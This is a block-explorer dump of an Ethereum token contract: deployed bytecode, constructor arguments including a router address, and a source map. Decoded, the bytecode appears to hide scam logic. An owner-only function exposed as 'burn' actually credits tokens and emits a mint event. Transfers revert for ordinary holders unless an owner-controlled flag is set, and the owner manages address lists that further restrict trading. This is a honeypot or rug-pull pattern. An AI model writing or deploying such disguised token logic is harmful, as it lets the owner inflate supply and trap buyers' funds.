952ba7f163c4a11628f55a4df523b3ef8460405161143b9190611b4c565b60405180910390a3506114a0565b60011515600960009054906101000a900460ff1615151461149f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161149690611aec565b60405180910390fd5b5b505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611515576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161150c90611aac565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081816115659190611b9e565b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516116069190611b4c565b60405180910390a3505050565b505050565b60008135905061162781612093565b92915050565b60008135905061163c816120aa565b92915050565b60006020828403121561165457600080fd5b600061166284828501611618565b91505092915050565b6000806040838503121561167e57600080fd5b600061168c85828601611618565b925050602061169d85828601611618565b9150509250929050565b6000806000606084860312156116bc57600080fd5b60006116ca86828701611618565b93505060206116db86828701611618565b92505060406116ec8682870161162d565b9150509250925092565b6000806040838503121561170957600080fd5b600061171785828601611618565b92505060206117288582860161162d565b9150509250929050565b60006020828403121561174457600080fd5b60006117528482850161162d565b91505092915050565b61176481611c28565b82525050565b61177381611c3a565b82525050565b600061178482611b82565b61178e8185611b8d565b935061179e818560208601611c7d565b6117a781611d40565b840191505092915050565b60006117bf602383611b8d565b91506117ca82611d51565b604082019050919050565b60006117e2602983611b8d565b91506117ed82611da0565b604082019050919050565b6000611805602683611b8d565b915061181082611def565b604082019050919050565b6000611828602283611b8d565b915061183382611e3e565b604082019050919050565b600061184b602683611b8d565b915061185682611e8d565b604082019050919050565b600061186e602883611b8d565b915061187982611edc565b604082019050919050565b6000611891602083611b8d565b915061189c82611f2b565b602082019050919050565b60006118b4602183611b8d565b91506118bf82611f54565b604082019050919050565b60006118d7602583611b8d565b91506118e282611fa3565b604082019050919050565b60006118fa600083611b8d565b915061190582611ff2565b600082019050919050565b600061191d602483611b8d565b915061192882611ff5565b604082019050919050565b6000611940602583611b8d565b915061194b82612044565b604082019050919050565b61195f81611c66565b82525050565b61196e81611c70565b82525050565b6000602082019050611989600083018461175b565b92915050565b60006020820190506119a4600083018461176a565b92915050565b600060208201905081810360008301526119c48184611779565b905092915050565b600060208201905081810360008301526119e5816117b2565b9050919050565b60006020820190508181036000830152611a05816117d5565b9050919050565b60006020820190508181036000830152611a25816117f8565b9050919050565b60006020820190508181036000830152611a458161181b565b9050919050565b60006020820190508181036000830152611a658161183e565b9050919050565b60006020820190508181036000830152611a8581611861565b9050919050565b60006020820190508181036000830152611aa581611884565b9050919050565b60006020820190508181036000830152611ac5816118a7565b9050919050565b60006020820190508181036000830152611ae5816118ca565b9050919050565b60006020820190508181036000830152611b05816118ed565b9050919050565b60006020820190508181036000830152611b2581611910565b9050919050565b60006020820190508181036000830152611b4581611933565b9050919050565b6000602082019050611b616000830184611956565b92915050565b6000602082019050611b7c6000830184611965565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611ba982611c66565b9150611bb483611c66565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611be957611be8611ce2565b5b828201905092915050565b6000611bff82611c66565b9150611c0a83611c66565b925082821015611c1d57611c1c611ce2565b5b828203905092915050565b6000611c3382611c46565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611c9b578082015181840152602081019050611c80565b83811115611caa576000848401525b50505050565b60006002820490506001821680611cc857607f821691505b60208210811415611cdc57611cdb611d11565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f5472616e7366657220616d6f756e74206d75737420626520677261746572207460008201527f6861746e207a65726f0000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b50565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b61209c81611c28565b81146120a757600080fd5b50565b6120b381611c66565b81146120be57600080fd5b5056fea2646970667358221220a32320b96e27a2b16e1c638a6717c3785c24f3707cc92ae7b87114232859234c64736f6c634300080100330000000000000000000000000000000000000000000000056bc75e2d631000000000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061012c5760003560e01c8063609c92b8116100ad578063a457c2d711610071578063a457c2d714610347578063a55626cb14610377578063a9059cbb14610395578063dd62ed3e146103c5578063f2fde38b146103f55761012c565b8063609c92b8146102a157806370a08231146102bf5780638f84aa09146102ef57806395d89b411461030d5780639f87adc91461032b5761012c565b8063313ce567116100f4578063313ce567146101eb57806339509351146102095780633caa8aca1461023957806342966c6814610269578063549f3295146102855761012c565b806306fdde0314610131578063095ea7b31461014f578063158ef93e1461017f57806318160ddd1461019d57806323b872dd146101bb575b600080fd5b610139610411565b60405161014691906119aa565b60405180910390f35b610169600480360381019061016491906116f6565b6104a3565b604051610176919061198f565b60405180910390f35b6101876104c1565b604051610194919061198f565b60405180910390f35b6101a56104d8565b6040516101b29190611b4c565b60405180910390f35b6101d560048036038101906101d091906116a7565b6104e2565b6040516101e2919061198f565b60405180910390f35b6101f36105e3565b6040516102009190611b67565b60405180910390f35b610223600480360381019061021e91906116f6565b6105ec565b604051610230919061198f565b60405180910390f35b610253600480360381019061024e9190611642565b610698565b604051610260919061198f565b60405180910390f35b610283600480360381019061027e9190611732565b6106ee565b005b61029f600480360381019061029a9190611642565b610790565b005b6102a9610879565b6040516102b69190611b4c565b60405180910390f35b6102d960048036038101906102d49190611642565b61087f565b6040516102e69190611b4c565b60405180910390f35b6102f76108c8565b6040516103049190611974565b60405180910390f35b6103156108f2565b60405161032291906119aa565b60405180910390f35b61034560048036038101906103409190611642565b610984565b005b610361600480360381019061035c91906116f6565b610a6d565b60405161036e919061198f565b60405180910390f35b61037f610b61565b60405161038c9190611974565b60405180910390f35b6103af60048036038101906103aa91906116f6565b610b8b565b6040516103bc919061198f565b60405180910390f35b6103df60048036038101906103da919061166b565b610ba9565b6040516103ec9190611b4c565b60405180910390f35b61040f600480360381019061040a9190611642565b610c30565b005b60606005805461042090611cb0565b80601f016020809104026020016040519081016040528092919081815260200182805461044c90611cb0565b80156104995780601f1061046e57610100808354040283529160200191610499565b820191906000526020600020905b81548152906001019060200180831161047c57829003601f168201915b5050505050905090565b60006104b76104b0610dec565b8484610df4565b6001905092915050565b6000600960009054906101000a900460ff16905090565b6000600454905090565b60006104ef848484610fbf565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061053a610dec565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156105ba576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105b190611a6c565b60405180910390fd5b6105d7856105c6610dec565b85846105d29190611bf4565b610df4565b60019150509392505050565b60006009905090565b600061068e6105f9610dec565b848460036000610607610dec565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106899190611b9e565b610df4565b6001905092915050565b6000600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461077c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161077390611a8c565b60405180910390fd5b61078d610787610dec565b826114a5565b50565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461081e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161081590611a8c565b60405180910390fd5b6001600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b60075481565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461090190611cb0565b80601f016020809104026020016040519081016040528092919081815260200182805461092d90611cb0565b801561097a5780601f1061094f5761010080835404028352916020019161097a565b820191906000526020600020905b81548152906001019060200180831161095d57829003601f168201915b5050505050905090565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a12576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a0990611a8c565b60405180910390fd5b6000600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b60008060036000610a7c610dec565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610b39576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b3090611b2c565b60405180910390fd5b610b56610b44610dec565b858584610b519190611bf4565b610df4565b600191505092915050565b6000600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000610b9f610b98610dec565b8484610fbf565b6001905092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610cbe576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb590611a8c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610d2e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2590611a0c565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610e64576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e5b90611b0c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ed4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ecb90611a2c565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610fb29190611b4c565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16141561102f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161102690611acc565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561109f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611096906119cc565b60405180910390fd5b600081116110e2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110d9906119ec565b60405180910390fd5b600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806111835750600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156111df5760001515600960009054906101000a900460ff161515146111de576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111d590611aec565b60405180910390fd5b5b60011515600960009054906101000a900460ff161515148061124c575060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b806112a2575060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b15611449576112b2838383611613565b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611339576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161133090611a4c565b60405180910390fd5b81816113459190611bf4565b600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546113d79190611b9e565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161143b9190611b4c565b60405180910390a3506114a0565b60011515600960009054906101000a900460ff1615151461149f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161149690611aec565b60405180910390fd5b5b505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611515576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161150c90611aac565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081816115659190611b9e565b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516116069190611b4c565b60405180910390a3505050565b505050565b60008135905061162781612093565b92915050565b60008135905061163c816120aa565b92915050565b60006020828403121561165457600080fd5b600061166284828501611618565b91505092915050565b6000806040838503121561167e57600080fd5b600061168c85828601611618565b925050602061169d85828601611618565b9150509250929050565b6000806000606084860312156116bc57600080fd5b60006116ca86828701611618565b93505060206116db86828701611618565b92505060406116ec8682870161162d565b9150509250925092565b6000806040838503121561170957600080fd5b600061171785828601611618565b92505060206117288582860161162d565b9150509250929050565b60006020828403121561174457600080fd5b60006117528482850161162d565b91505092915050565b61176481611c28565b82525050565b61177381611c3a565b82525050565b600061178482611b82565b61178e8185611b8d565b935061179e818560208601611c7d565b6117a781611d40565b840191505092915050565b60006117bf602383611b8d565b91506117ca82611d51565b604082019050919050565b60006117e2602983611b8d565b91506117ed82611da0565b604082019050919050565b6000611805602683611b8d565b915061181082611def565b604082019050919050565b6000611828602283611b8d565b915061183382611e3e565b604082019050919050565b600061184b602683611b8d565b915061185682611e8d565b604082019050919050565b600061186e602883611b8d565b915061187982611edc565b604082019050919050565b6000611891602083611b8d565b915061189c82611f2b565b602082019050919050565b60006118b4602183611b8d565b91506118bf82611f54565b604082019050919050565b60006118d7602583611b8d565b91506118e282611fa3565b604082019050919050565b60006118fa600083611b8d565b915061190582611ff2565b600082019050919050565b600061191d602483611b8d565b915061192882611ff5565b604082019050919050565b6000611940602583611b8d565b915061194b82612044565b604082019050919050565b61195f81611c66565b82525050565b61196e81611c70565b82525050565b6000602082019050611989600083018461175b565b92915050565b60006020820190506119a4600083018461176a565b92915050565b600060208201905081810360008301526119c48184611779565b905092915050565b600060208201905081810360008301526119e5816117b2565b9050919050565b60006020820190508181036000830152611a05816117d5565b9050919050565b60006020820190508181036000830152611a25816117f8565b9050919050565b60006020820190508181036000830152611a458161181b565b9050919050565b60006020820190508181036000830152611a658161183e565b9050919050565b60006020820190508181036000830152611a8581611861565b9050919050565b60006020820190508181036000830152611aa581611884565b9050919050565b60006020820190508181036000830152611ac5816118a7565b9050919050565b60006020820190508181036000830152611ae5816118ca565b9050919050565b60006020820190508181036000830152611b05816118ed565b9050919050565b60006020820190508181036000830152611b2581611910565b9050919050565b60006020820190508181036000830152611b4581611933565b9050919050565b6000602082019050611b616000830184611956565b92915050565b6000602082019050611b7c6000830184611965565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611ba982611c66565b9150611bb483611c66565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611be957611be8611ce2565b5b828201905092915050565b6000611bff82611c66565b9150611c0a83611c66565b925082821015611c1d57611c1c611ce2565b5b828203905092915050565b6000611c3382611c46565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611c9b578082015181840152602081019050611c80565b83811115611caa576000848401525b50505050565b60006002820490506001821680611cc857607f821691505b60208210811415611cdc57611cdb611d11565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f5472616e7366657220616d6f756e74206d75737420626520677261746572207460008201527f6861746e207a65726f0000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b50565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b61209c81611c28565b81146120a757600080fd5b50565b6120b381611c66565b81146120be57600080fd5b5056fea2646970667358221220a32320b96e27a2b16e1c638a6717c3785c24f3707cc92ae7b87114232859234c64736f6c63430008010033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000000000000000000000000000056bc75e2d631000000000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d

-----Decoded View---------------
Arg [0] : supply (uint256): 100000000000000000000
Arg [1] : router (address): 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D

-----Encoded View---------------
2 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000056bc75e2d63100000
Arg [1] : 0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d


Deployed Bytecode Sourcemap

112:2214:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1918:91:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4057:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;823:82:3;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3010:108:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4708:422;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2862:83;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5539:215;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1128:114:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2131:93;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1023:97;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;250:29;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3181:127:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1170:92:4;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2128:95:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;916:99:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;6257:377:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2233:90:3;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3521:175:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3759:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1628:249:4;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1918:91:1;1963:13;1996:5;1989:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1918:91;:::o;4057:169::-;4140:4;4157:39;4166:12;:10;:12::i;:::-;4180:7;4189:6;4157:8;:39::i;:::-;4214:4;4207:11;;4057:169;;;;:::o;823:82:3:-;867:4;891:6;;;;;;;;;;;884:13;;823:82;:::o;3010:108:1:-;3071:7;3098:12;;3091:19;;3010:108;:::o;4708:422::-;4814:4;4831:36;4841:6;4849:9;4860:6;4831:9;:36::i;:::-;4880:24;4907:11;:19;4919:6;4907:19;;;;;;;;;;;;;;;:33;4927:12;:10;:12::i;:::-;4907:33;;;;;;;;;;;;;;;;4880:60;;4979:6;4959:16;:26;;4951:79;;;;;;;;;;;;:::i;:::-;;;;;;;;;5041:57;5050:6;5058:12;:10;:12::i;:::-;5091:6;5072:16;:25;;;;:::i;:::-;5041:8;:57::i;:::-;5118:4;5111:11;;;4708:422;;;;;:::o;2862:83::-;2911:5;2936:1;2929:8;;2862:83;:::o;5539:215::-;5627:4;5644:80;5653:12;:10;:12::i;:::-;5667:7;5713:10;5676:11;:25;5688:12;:10;:12::i;:::-;5676:25;;;;;;;;;;;;;;;:34;5702:7;5676:34;;;;;;;;;;;;;;;;:47;;;;:::i;:::-;5644:8;:80::i;:::-;5742:4;5735:11;;5539:215;;;;:::o;1128:114:3:-;1195:4;1219:5;:15;1225:8;1219:15;;;;;;;;;;;;;;;;;;;;;;;;;1212:22;;1128:114;;;:::o;2131:93::-;1404:10:4;1395:19;;:5;;;;;;;;;;:19;;;1387:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;2189:27:3::1;2195:12;:10;:12::i;:::-;2209:6;2189:5;:27::i;:::-;2131:93:::0;:::o;1023:97::-;1404:10:4;1395:19;;:5;;;;;;;;;;:19;;;1387:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;1108:4:3::1;1090:5;:15;1096:8;1090:15;;;;;;;;;;;;;;;;:22;;;;;;;;;;;;;;;;;;1023:97:::0;:::o;250:29::-;;;;:::o;3181:127:1:-;3255:7;3282:9;:18;3292:7;3282:18;;;;;;;;;;;;;;;;3275:25;;3181:127;;;:::o;1170:92:4:-;1215:7;1242:12;;;;;;;;;;;1235:19;;1170:92;:::o;2128:95:1:-;2175:13;2208:7;2201:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2128:95;:::o;916:99:3:-;1404:10:4;1395:19;;:5;;;;;;;;;;:19;;;1387:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;1002:5:3::1;984;:15;990:8;984:15;;;;;;;;;;;;;;;;:23;;;;;;;;;;;;;;;;;;916:99:::0;:::o;6257:377:1:-;6350:4;6367:24;6394:11;:25;6406:12;:10;:12::i;:::-;6394:25;;;;;;;;;;;;;;;:34;6420:7;6394:34;;;;;;;;;;;;;;;;6367:61;;6467:15;6447:16;:35;;6439:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;6535:67;6544:12;:10;:12::i;:::-;6558:7;6586:15;6567:16;:34;;;;:::i;:::-;6535:8;:67::i;:::-;6622:4;6615:11;;;6257:377;;;;:::o;2233:90:3:-;2281:7;2308;;;;;;;;;;;2301:14;;2233:90;:::o;3521:175:1:-;3607:4;3624:42;3634:12;:10;:12::i;:::-;3648:9;3659:6;3624:9;:42::i;:::-;3684:4;3677:11;;3521:175;;;;:::o;3759:151::-;3848:7;3875:11;:18;3887:5;3875:18;;;;;;;;;;;;;;;:27;3894:7;3875:27;;;;;;;;;;;;;;;;3868:34;;3759:151;;;;:::o;1628:249:4:-;1404:10;1395:19;;:5;;;;;;;;;;:19;;;1387:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;1737:1:::1;1717:22;;:8;:22;;;;1709:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;1826:8;1798:37;;1819:5;::::0;::::1;;;;;;;;1798:37;;;;;;;;;;;;1861:8;1846:12;;:23;;;;;;;;;;;;;;;;;;1628:249:::0;:::o;601:98:0:-;654:7;681:10;674:17;;601:98;:::o;8814:346:1:-;8933:1;8916:19;;:5;:19;;;;8908:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9014:1;8995:21;;:7;:21;;;;8987:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9098:6;9068:11;:18;9080:5;9068:18;;;;;;;;;;;;;;;:27;9087:7;9068:27;;;;;;;;;;;;;;;:36;;;;9136:7;9120:32;;9129:5;9120:32;;;9145:6;9120:32;;;;;;:::i;:::-;;;;;;;;8814:346;;;:::o;1250:873:3:-;1375:1;1357:20;;:6;:20;;;;1349:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;1459:1;1438:23;;:9;:23;;;;1430:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;1529:1;1520:6;:10;1512:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;1591:5;:13;1597:6;1591:13;;;;;;;;;;;;;;;;;;;;;;;;;:33;;;;1608:5;:16;1614:9;1608:16;;;;;;;;;;;;;;;;;;;;;;;;;1591:33;1587:67;;;1644:5;1634:15;;:6;;;;;;;;;;;:15;;;1626:28;;;;;;;;;;;;:::i;:::-;;;;;;;;;1587:67;1680:4;1670:14;;:6;;;;;;;;;;;:14;;;:33;;;;1698:5;;;;;;;;;;1688:15;;:6;:15;;;1670:33;:55;;;;1720:5;;;;;;;;;;1707:18;;:9;:18;;;1670:55;1666:450;;;1738:47;1759:6;1767:9;1778:6;1738:20;:47::i;:::-;1796:21;1820:9;:17;1830:6;1820:17;;;;;;;;;;;;;;;;1796:41;;1873:6;1856:13;:23;;1848:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;1969:6;1953:13;:22;;;;:::i;:::-;1933:9;:17;1943:6;1933:17;;;;;;;;;;;;;;;:42;;;;2010:6;1986:9;:20;1996:9;1986:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;2049:9;2032:35;;2041:6;2032:35;;;2060:6;2032:35;;;;;;:::i;:::-;;;;;;;;1666:450;;;;2105:4;2095:14;;:6;;;;;;;;;;;:14;;;2086:28;;;;;;;;;;;;:::i;:::-;;;;;;;;;1666:450;1250:873;;;:::o;8061:315:1:-;81